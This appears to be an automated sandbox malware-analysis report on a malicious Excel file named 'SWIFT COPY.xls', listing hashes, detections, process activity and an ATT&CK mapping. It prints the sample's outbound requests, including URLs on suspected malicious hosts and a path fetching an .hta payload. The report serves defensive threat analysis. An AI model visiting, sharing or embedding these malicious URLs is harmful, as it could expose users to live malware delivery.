
Windows Analysis Report
SWIFT COPY.xls

Overview

General Information

Sample name: SWIFT COPY.xls
Analysis ID: 1636401
MD5: b731eb838e4e8d534ea62b2ebf15dcda
SHA1: 2c2d81fef7800be7c3ddbbac94cd8fb7faf09bd7
SHA256: 08cfe7d6a9b65191e9e1b21080083572b724a1dd985b11377586c6d0562d6e73
Tags: xls, user-abuse_ch

Detection

Score: 60
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Excel sheet contains many unusual embedded objects
Detected non-DNS traffic on DNS port
Document contains embedded VBA macros
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 7520 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • splwow64.exe (PID: 7336 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • EXCEL.EXE (PID: 1264 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\SWIFT COPY.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Network Connection; Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton; Data: DestinationIp: 5.161.200.29, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7520, Protocol: tcp, SourceIp: 192.168.2.26, SourceIsIpv6: false, SourcePort: 61467
Source: Network Connection; Author: X__Junior (Nextron Systems); Data: DestinationIp: 192.168.2.26, DestinationIsIpv6: false, DestinationPort: 61467, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7520, Protocol: tcp, SourceIp: 5.161.200.29, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

AV Detection

Source: SWIFT COPY.xls; Avira: detected
Source: SWIFT COPY.xls; Virustotal: Detection: 26%
Source: SWIFT COPY.xls; ReversingLabs: Detection: 34%
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Directory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll
Source: global traffic; DNS query: name: browser.events.data.msn.cn
Source: global traffic; DNS query: name: st3.pro
Source: global traffic; DNS query: name: link.saja.market
Source: global traffic; DNS query: name: otelrules.svc.static.microsoft
Source: excel.exe; Memory has grown: Private usage: 2MB later: 85MB
Source: global traffic; TCP traffic: 192.168.2.26:61463 -> 162.159.36.2:53
Source: Joe Sandbox View; IP Address: 13.107.246.67
Source: Joe Sandbox View; IP Address: 3.39.153.44
Source: Joe Sandbox View; IP Address: 5.161.200.29
Source: global traffic; HTTP traffic detected:
    GET /K04HU0R?&enigma=dirty&metallurgist=small&motorcycle HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: st3.pro
    Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
    GET /oXDrbQsGTO?&swimsuit=better&join=unaccountable&training HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Connection: Keep-Alive
    Host: link.saja.market
Source: global traffic; HTTP traffic detected:
    GET /342/cntro/kissingthebestpersonentiretimetogivebestthingsevermeet.hta HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Connection: Keep-Alive
    Host: 23.95.235.45
Source: unknown; TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown; TCP traffic detected without corresponding DNS query: 23.95.235.45
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: browser.events.data.msn.cn
Source: global traffic; DNS traffic detected: DNS query: st3.pro
Source: global traffic; DNS traffic detected: DNS query: link.saja.market
Source: global traffic; DNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: Primary1741801097559363500_A6BFE9B8-725C-497F-9323-A8954BFF2CA2.log.14.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626/en-US/en-CH.en-GB.en-US/Metadata
Source: Primary1741800995818548700_F97F23E9-4EAF-41B7-94B8-F9B59026EFEB.log.0.dr; String found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/flatfontassets.pkg
Source: SWIFT COPY.xls, 79760000.0.dr; String found in binary or memory: https://st3.pro/K04HU0R?&enigma=dirty&metallurgist=small&motorcycle
Source: unknown; Network traffic detected: HTTP traffic on port 61467 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 61470
Source: unknown; Network traffic detected: HTTP traffic on port 61471 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 61470 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 61468
Source: unknown; Network traffic detected: HTTP traffic on port 61468 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 61471
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 61467

System Summary

Source: SWIFT COPY.xls; OLE: Microsoft Excel 2007+
Source: 79760000.0.dr; OLE: Microsoft Excel 2007+
Source: SWIFT COPY.xls; OLE indicator, VBA macros: true
Source: classification engine; Classification label: mal60.winXLS@4/13@4/4
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Users\user\Desktop\79760000
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\{F97F23E9-4EAF-41B7-94B8-F9B59026EFEB} - OProcSessId.dat
Source: SWIFT COPY.xls; OLE indicator, Workbook stream: true
Source: 79760000.0.dr; OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: unknown; Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown; Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\SWIFT COPY.xls"
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: SWIFT COPY.xls; Static file information: File size 1261568 > 1048576
Source: 79760000.0.dr; Initial sample: OLE indicators vbamacros = False
Source: SWIFT COPY.xls; Initial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: SWIFT COPY.xls; Stream path 'Workbook' entropy: 7.96388874982 (max. 8.0)
Source: 79760000.0.dr; Stream path 'Workbook' entropy: 7.95156133439 (max. 8.0)
Source: C:\Windows\splwow64.exe; Window / User API: threadDelayed 381
Source: C:\Windows\splwow64.exe; Last function: Thread delayed
Source: C:\Windows\splwow64.exe; Thread delayed: delay time: 120000
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Process information queried: ProcessInformation
MITRE ATT&CK Matrix (count of matching signatures in parentheses)

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Scripting (1) | Valid Accounts | Exploitation for Client Execution (3) | Scripting (1) | Process Injection (1) | Masquerading (3) | OS Credential Dumping | Process Discovery (1) | Remote Services | Data from Local System | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Extra Window Memory Injection (1) | Virtualization/Sandbox Evasion (1) | LSASS Memory | Virtualization/Sandbox Evasion (1) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Process Injection (1) | Security Account Manager | Application Window Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Obfuscated Files or Information (1) | NTDS | File and Directory Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (13) | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Extra Window Memory Injection (1) | LSA Secrets | System Information Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |